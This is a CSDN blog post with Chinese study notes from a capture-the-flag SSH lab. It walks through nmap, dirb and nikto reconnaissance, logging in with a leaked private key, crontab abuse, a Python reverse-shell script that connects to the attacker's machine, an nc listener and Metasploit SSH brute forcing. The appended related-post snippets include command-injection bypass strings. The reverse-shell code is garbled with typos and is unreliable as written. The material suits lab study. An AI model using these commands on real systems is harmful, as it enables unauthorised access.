获取flag值

最新推荐文章于 2024-04-28 20:33:33 发布
最新推荐文章于 2024-04-28 20:33:33 发布
阅读量1w 收藏 43
点赞数 7
分类专栏: 笔记 文章标签: 安全 linux ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49091880/article/details/112125446
版权

获取FLAG值
一、SSH服务器
1.如何从外部进入最终root主机,获得flag值
SSH:建立在应用层基础上的协议
SSH是目前较可靠,专门远程登录会话和其他网络服务提供安全性的
协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题
2.SSH基于TCP 22端口的服务
3.SSH协议认证机制
(1)基于口令的安全验证
(2)基于密钥的安全验证
注:id_rsa:私钥 id_rsa.pub:公钥
二、实验环境
1.攻击机:192.168.1.105
2.靶机机器:192.168.1.106
三、开始行动
1.信息探测
(1)nmap -sV 靶场IP地址(探测靶场开放的服务于服务的版本)
(2)nmap -A -v 靶场IP地址(探测靶机的全部信息)
(3)nmap -O 靶场IP地址(探测靶场的操作系统类型和版本)
在这里插入图片描述在这里插入图片描述
2.分析探测结果
对于SSH服务的22端口的靶场
首先考虑: (1)暴力破解 (2)私钥泄露
对于开放http服务的80端口或者其他端口的靶场
首先考虑:
(1)通过浏览器访问对应的靶场http服务
http://靶场ip地址:http服务器口
(2)使用探测工具对http的目录进行探测
Dirb http://靶场ip地址:http服务端口
特别注意: 特殊端口 (大于1024的端口)
3.挖掘敏感信息
(1)使用浏览器对靶场IP额http服务探测,对页面中展示的内容也要注意,尤其是联系人等信息,递归访问
(2)尤其对robots.txt以及一些目录进行访问,挖掘具备利用价值的信息
4.对靶场进行探测

5.使用nikto扫描器也可以挖掘敏感信息
命令:nikto -host 靶场IP地址
注:特别注意config等特殊敏感信息文件、要细读扫描的结果,挖掘可以利用的敏感信息
6.利用敏感、弱点信息
(1)对挖掘到的SSH密钥进行利用
修改id_rsa的权限:chmod 600 id/-rsa
(2)利用私钥登陆服务器
Ssh -i id_ras 用户名@靶场ip地址
注:如果id_rsa没有解密密码,可以直接使用。但如果id_rsa有解密密码,那么就要进行对应的破解。
在这里插入图片描述
7.登陆服务器之后
(1)查看当前用户whoami
(2)id 查看当前用户权限
(3)查看根目录 寻找flag文件
8.如果是root权限,表明被全部拿下
一般情况下:flag文件只属于root用户和对应的用户组
Cat /etc/passwd 查看所有用户的列表
Cat /etc/group 查看用户组
Find /-User 用户名 查看属于某些用户的文件
/tmp 查看缓冲文件目录
9.深入挖掘
(1)通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要root 权限
(2)cat /etc/crontab 挖掘其他用户是否有定时任务,并查看对应的任务内容
在这里插入图片描述
10.反弹shell
靶场代码
#/usr/bin/python
import os,subprocess,socket
s=socket.socekt(socket.AF_ JINET,socket.SOCK_ STREAM)
s.connect((“攻击机IP地址”,“攻击机监听端口”))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocscall([*/bin/sh”-")
11.nc -lvp 4445:监听端口
查看占用端口 netstat -pantu
12.深入挖掘
目标:寻找可以root靶场机器的方式
Su -root
查看用户 whoami
查看对应的权限 id
13.背水一战
在这里插入图片描述
14.使用metasploit破解SSH
在终端输入
Msfconsole
–msfsf >use: axiliary/scanner/ssh/ssh_ login
– msf auxiliary(ssh_ login) > set rhosts 192.168.1.137
–msf auxiliary(ssh_ login) > set username hadi
–msf auxiliary(ssh_ login) > set pass_ file hadi.txt
– msf auxiliarylssh_ login) > run
在这里插入图片描述
在这里插入图片描述
使用用户名及破解密码登录
在这里插入图片描述
最终获得root 权限,获取FLAG值

以上是自己看视频学习所做的总结,希望能给大家一点帮助!!!

墨轩小白
关注
  • 7
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
golang flag简单用法
09-20
`ARGS`变量用于收集未被标志占用的剩余命令行参数,可以使用`flag.Args()`获取这些参数,并使用`strings.Join()`将它们合并成一个字符串。 ```go ARGS = strings.Join(flag.Args(), " ") ``` 在检查和处理标志的...
Java获取json数组对象的实例讲解
10-18
此外,JSON库还提供了其他方法,如`getBoolean()`, `getInt()`, `getDouble()`等,用于获取不同类型的。同时,`put()`方法用于向JSONObject或JSONArray中添加新的键对或元素。理解并熟练运用这些方法,将使你在...
找Flag
learninger12的博客
02-09 606
找Flag
js中获取modelandview中的数据_简单的CTF-从JS中获取flag
weixin_35625309的博客
01-22 439
本文是一篇从合天网安实验室进行实验操作的笔记,一次非常简单地从JS中获取到flag的操作。实验地址:https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECID9d6c0ca797abec2016092313300000001&pk_campaign=toutiao-wemedia1. 进入题目页(10.1.1.219:20123)看到一段...
ctfshow web78 获取flag(用老版的火狐浏览器)
最新发布
XiaoYeZhu_1314的博客
04-28 347
第一种:利用input伪协议 ,获取到flag。第二种:利用flter协议,获取到flag。第三种:利用data 协议 获取到fag。
http://106.52.39.144:88 找到flag
qq_53701412的博客
02-01 2926
找flag
第1-63题总结:URL提交参数获取flag
分享简单的安全技术
05-10 3775
第一种:使用目录穿越方法,提交参数时输入:xxxx?/…/…/…/…/flag,利用?/将xxx文件失效,解析到flag所在文档,eg:第一题 第二种:使用filter协议读取文件,语句:php://filter/read=convert.base64-encode/resource=flag.php 第三种:执行ping命令时,使用|或;执行除ping命令外我们想要执行的命令 空格替换:采用$IPS$1代替空格 关键字替换,cat /flag=a=g;cat$IFS$1fla$a 第四种:利用空格绕过WA
Android的进程间通信(五) 之 Binder内核层以及ServiceManager初始化流程
共同交流与成长
12-23 323
Linux系统中,有驱动的扩展接口。Google在Linux的基础,增加一个Binder驱动,也就是前面几讲一直在说binder“内核”。 我们先来看一下Binder的内核注册的过程吧 在binder的内核文件中,Linux系统会自动调用 binder_init 的初始化方法,在这个初始化函数中,有一个 misc_register(&binder_miscdev) 函数。misc_register 是一个系统级别的函数,而参数binder_miscdev是一个结构体。我们来看一下 &bind
IP_获取连接者IP_
10-03
但请注意,这个可以被轻易伪造,所以对于安全相关的应用,应当谨慎处理。 为了适应不同情况,下面是一个简单的PHP示例,它尝试获取并验证用户的真实IP: ```php function get_client_ip() { $ip = $_SERVER['...
VC++获取CPU信息.rar
03-15
hr = pSvc->ExecQuery(_bstr_t(L"WQL"), query, WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &pEnumerator); SysFreeString(query); if (FAILED(hr)) { std::cout ; pSvc->Release(); ...
activity传递
07-10
"activity传递"是指在不同的Activity之间传输数据的过程。在这个过程中,我们通常会使用Intent对象来实现这一功能。Intent不仅用于启动一个新的Activity,还可以携带数据在它们之间进行通信。 首先,让我们了解...
CTF利用大佬们的webshell拿取flag_ctf留言板获取flag,HarmonyOS鸿蒙开发面试宝典
2401_84182824的博客
04-16 422
从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!这里盲猜题目要求可能是需要登录后台(注入或越权)之后进行文件上传。可以看见这场比赛师傅们上传了很多东西。但唯一发现了一个zb.php无疑是个webshell。本来想把图片下载下来,看看一些大佬上传的图片马密码。比较早的一场CTF了,做了几个web。而upload最为显著了,发现存在目录遍历。但是继续往下翻,发现了点东西。需要的话可以点击**
工具方法——根据flag获取对应的
2551的博客
07-20 2715
根据flag获取对应的 有时候我们在做数据存储的时候,会需要根据一个flag,然后转换为对应的中文存到数据库中,例如: String flag = "1,2,4"; String str = "1小轿车;2大卡车;3大巴车;4摩托车;5坦克;6皮卡车"; flag是我们后台接收到的,数据库中需要存的是对应的中文。使用以下方法,就可以很方便地进行转化。 public String convert(String str, String flag) { // 0新保;1续保;2转保;3电销;
记一次Flag获取
chenweicheer的博客
05-04 4325
题目链接http://ctf5.shiyanbar.com/qwctf/flag-checker.html        这是实验吧的一个题目很简单打开链接弹出一个input框输入正确的就是flag,验证也很简单首先是输入长度必须是47后面全部是一些方程。通过解这个题目我巩固了栈,求逆波兰表达式,和逆波兰表达式求。基础很重要决定记录下来。        思路:将判断表达式提取出来用&&来分割
【软件逆向-求解flag】内存获取、逆变换操作、线性变换、约束求解
07-05 984
【软件逆向-求解flag
flag与0进行比较(浮点型)
cg1998的博客
07-13 576
AWD靶机实战第二天:使用python脚本获取flag
2203_75839317的博客
04-10 1336
ls /flag.txt,就可以拿到flag。4,自动提交flag:现在我们就要考虑如何进行自动提交flag,我们来到提交页面发现有提示,有请求头。
通过系统调用open来查看flag
Carrot_kexin的博客
10-17 258
这段代码中while有一个无法退出的循环,不能通过ROP获取flag,只能在代码中执行open函数。 我们希望构造这样的代码来拿到flag: int fd = open("flag", READONLY); read(fd, buf, 100); print(buf); 在程序中寻找可以利用的修改rax、rdi、rsi、rdx的语句(64位程序通过寄存器传参,rax用于系统调用): 具体能利用的地方在: 0x4008a1 : pop rsi ; pop r15 ; ret 0x4008a3 : .
获取flag.pcapng解析
12-03
获取flag.pcapng文件的分析,需要进行以下步骤: 1. 首先,将flag.pcapng文件导入到网络数据包分析工具中,例如Wireshark等。 2. 打开Wireshark后,可以看到文件中捕获到的数据包列表。每个数据包表示一个网络通信过程。 3. 根据需求,可以选择过滤特定的数据包进行分析。Wireshark可以使用过滤器来筛选数据包,比如根据源IP地址、目的IP地址、协议类型等进行过滤。 4. 选中一个数据包后,可以查看详细的数据包信息。其中包括各层协议的字段,如以太网头部、IP头部、TCP/UDP头部等。根据协议类型,可以进一步分析数据包的含义。 5. 在数据包的载荷部分,可能包含一些应用层协议的数据。对于常见的协议,如HTTP、FTP、DNS等,可以根据协议规范来解析数据,并获取其中的关键信息。 6. 可以通过分析多个数据包之间的关系,了解网络通信的流程和交互过程。例如,查看TCP三次握手、HTTP请求和响应等过程。 7. 在分析过程中,可以注意一些异常现象,如错误的TCP重传、大量重复的数据包等,这些可能暗示着网络故障或攻击行为。 8. 对于更高级的分析需求,可以使用一些辅助工具或编写脚本来提取、分析数据包中的特定信息。 总之,通过以上步骤,就可以对flag.pcapng文件进行基本的解析和分析,从中获取网络通信过程中的关键信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值